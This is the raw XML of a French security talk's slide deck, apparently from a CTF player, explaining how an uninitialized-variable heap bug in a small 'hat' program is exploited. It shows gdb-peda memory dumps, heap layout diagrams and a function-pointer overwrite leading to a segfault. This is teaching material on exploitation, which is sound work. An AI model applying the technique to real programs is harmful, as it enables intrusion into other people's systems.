              <a:t>0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      0x56558010:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558018:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      0x00020fe9      0x56558020:     0x00000000      0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558028:     0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ ni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/10xw 0x56558008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558008:     0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      0x56558010:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558018:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      0x00020fe9      0x56558020:     0x00000000      0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558028:     0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r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8" name="Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BD1F28-A87A-44B7-9607-AE9CB5588F49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D63CBD2C-C621-4315-B74F-4D80A12620DD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8548D285-ED8C-4050-A732-552C1478232A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F6F35FC3-8678-4C58-9D00-8AAB95D4A589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Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A2E50F-1C50-4463-915D-34F4D45E66AC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13" name="Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8135C1B-F04E-4146-86FE-1C1AE78B7FC9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BA1774C-10DD-4267-9129-68F11200E6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626417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err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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1524000" y="1484784"/>
            <a:ext cx="9144000" cy="3602021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fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="http://www.tomtombinary.xyz"/>
              </a:rPr>
              <a:t>http://www.tomtombinary.xyz</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.root-me.org/Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://twitter.com/tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Aperi’Kube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/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941168"/>
            <a:ext cx="1728192" cy="172819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1558413"/>
            <a:ext cx="352839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79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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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311" y="2505472"/>
            <a:ext cx="5385804" cy="172819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524000" y="423307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ELSE ???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616" y="2505472"/>
            <a:ext cx="3456384" cy="11250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64159" y="5765660"/>
            <a:ext cx="2373873" cy="7200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Green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524000" y="5765660"/>
            <a:ext cx="1440160" cy="34804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name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1523999" y="6113709"/>
            <a:ext cx="1440160" cy="3720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display</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Connecteur en angle 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="0"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3197588" y="4812152"/>
            <a:ext cx="12700" cy="1907016"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 180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343472" y="5019792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Représentation simplifiée de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> après avoir ajouté un "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>":</a:t>
            </a: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86FE7BA5-BEEC-42AB-9366-05AF5B71F2A1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Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCAA9703-17DF-49F1-BB88-C0840F6F01C4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15" name="Flèche : chevron 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FBA11DB-CACB-405A-8B14-B2F7D6C06BA6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" name="Flèche : chevron 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC8DBC5-F1DA-4453-BFE9-1D0F735CB4CF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7" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90378110-9016-426B-BAC7-D603EF3E4321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18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F2BEE4C-4646-43F8-A4AD-ED607EA6C325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3519322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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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14214" y="1814792"/>
            <a:ext cx="9144000" cy="376064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Proof of Concept</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2899497" y="2511589"/>
            <a:ext cx="8640959" cy="7200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BIGNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMMMMMMMMMMMMMMMMEE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459338" y="2511589"/>
            <a:ext cx="1440160" cy="34804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name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459337" y="2859638"/>
            <a:ext cx="1440160" cy="3720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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red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2891134" y="3582893"/>
            <a:ext cx="8640959" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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BIGNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMMMMMMMMMMMMMMMMEE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1442207" y="3582893"/>
            <a:ext cx="1440160" cy="348049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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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name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442206" y="3930942"/>
            <a:ext cx="1440160" cy="372031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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red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7328" y="2592895"/>
            <a:ext cx="1394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1. new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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0" y="3664777"/>
            <a:ext cx="1442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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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7328" y="4797152"/>
            <a:ext cx="1442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3. new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2894806" y="4803570"/>
            <a:ext cx="1115616" cy="7200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green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1448556" y="4803570"/>
            <a:ext cx="1440160" cy="34804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name</a:t>
            </a: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1448555" y="5151619"/>
            <a:ext cx="1440160" cy="3720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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connecteur en angle 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="0"/>
            <a:endCxn id="4" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4699697" y="-8690"/>
            <a:ext cx="12700" cy="5040559"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 180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ngle 22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="0"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4686950" y="1058230"/>
            <a:ext cx="12700" cy="5049327"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 180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en angle 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2810625" y="4161581"/>
            <a:ext cx="12700" cy="1283978"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 180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010421" y="4803570"/>
            <a:ext cx="7528021" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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AAAAAAAAAAAAAAAAAAAAAAAAAMMMMMMMMMMMMMMMMEE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23664" y="5839581"/>
            <a:ext cx="1442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4. new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37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448556" y="5935123"/>
            <a:ext cx="1440160" cy="3720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name</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448555" y="6307154"/>
            <a:ext cx="1440160" cy="34804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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connecteur en angle 38"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="37" idx="0"/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2807580" y="5296179"/>
            <a:ext cx="12700" cy="1277888"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 180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6729832" y="5935123"/>
            <a:ext cx="4810624" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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AAAAAAMMMMMMMMMMMMMMMMEE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004331" y="5934583"/>
            <a:ext cx="1448813" cy="34804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name</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4004332" y="6288982"/>
            <a:ext cx="1448813" cy="36568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AAAA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453146" y="5935123"/>
            <a:ext cx="1276686" cy="7200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segfault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Connecteur en angle 44"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="0"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5409843" y="5253478"/>
            <a:ext cx="540" cy="1362751"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42333333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2888716" y="5935123"/>
            <a:ext cx="1115616" cy="7200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green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30" name="Flèche : chevron 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3201656-D244-4A74-AD44-63C2C3D13955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1" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{459C6046-D4D2-4B63-834C-3AE5061F5B90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32" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D95B292-3916-4F3F-BFE4-4D64AB3BDDDC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3" name="Flèche : chevron 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC029EEC-4279-4611-B6AF-01757A05C3EC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4" name="Flèche : chevron 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F154F9-E1C0-42CA-82BC-5CF6793DFBD2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46" name="Flèche : chevron 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B339F530-C9CA-4913-9AA4-ED414FD1BD7F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150532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  <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0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3B0FC9-0ABF-4760-94A3-53532F773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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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45C2A9B-1AFF-4EE9-9768-B9FAAF4F5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572" y="1600200"/>
            <a:ext cx="9172051" cy="51495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0B5429-04FE-43FD-BC70-FDF0790D99D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4149080"/>
            <a:ext cx="6228184" cy="360040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90A2D2-A57D-4689-BA8D-5462F0209B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1509919" y="6309320"/>
            <a:ext cx="1705761" cy="440443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1E8E68-9A1C-4269-9C6D-60E3A71A2035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524001" y="5405767"/>
            <a:ext cx="9068426" cy="543513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D47162-0EAF-4C97-8293-373B487F1DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3573016"/>
            <a:ext cx="2339752" cy="216024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5116A2A4-9A47-4410-BD7C-3801A4BEE6CC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D464DAE0-EC75-44DD-8237-EC21A84B9D5B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12" name="Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96F769F7-9516-4031-9DB8-59AB01D9AD74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Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310F46E6-9A66-4194-8C41-4409AA21A0C8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Flèche : chevron 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462460EF-0E3B-4DA4-BE8B-08245835FFD6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15" name="Flèche : chevron 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B83AE7E-DF9F-42D3-A777-FE39F027906A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396987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7A0713-D1F7-44FF-B2AB-1D5582E98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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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8B5E0F-57CF-4E69-A6B8-9CD50B195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221" y="2420888"/>
            <a:ext cx="9961558" cy="3456384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AA4A80B-1991-4293-A5C6-3BEBD33E637C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7392144" y="3429000"/>
            <a:ext cx="1224136" cy="6480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FD27E37-040A-4A2C-93B9-D86FDA522199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8616280" y="3176972"/>
            <a:ext cx="2388492" cy="504056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+mj-lt"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA91DF01-B834-4B69-889E-FCD5CB207AEB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Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD3D65A0-9A69-45DB-99CB-E71079547635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D1CF8DA3-7ACE-4AFD-8D45-8BDD2BB3EDCC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201CD37A-8F2B-4AB3-9FA1-2A97BF99F375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Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4021560A-ABD9-4F62-BFAA-0821E13CC19A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13" name="Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4157A7FC-84C3-4240-9C54-4583B0E4803D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512492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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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14214" y="1814792"/>
            <a:ext cx="9144000" cy="376064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784936" y="2514849"/>
            <a:ext cx="1440160" cy="34804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name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784935" y="2862898"/>
            <a:ext cx="1440160" cy="3720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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red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784935" y="3615937"/>
            <a:ext cx="1440160" cy="348049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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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name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784934" y="3963986"/>
            <a:ext cx="1440160" cy="372031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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="B868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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red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7328" y="2592895"/>
            <a:ext cx="1394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1. new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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0" y="3664777"/>
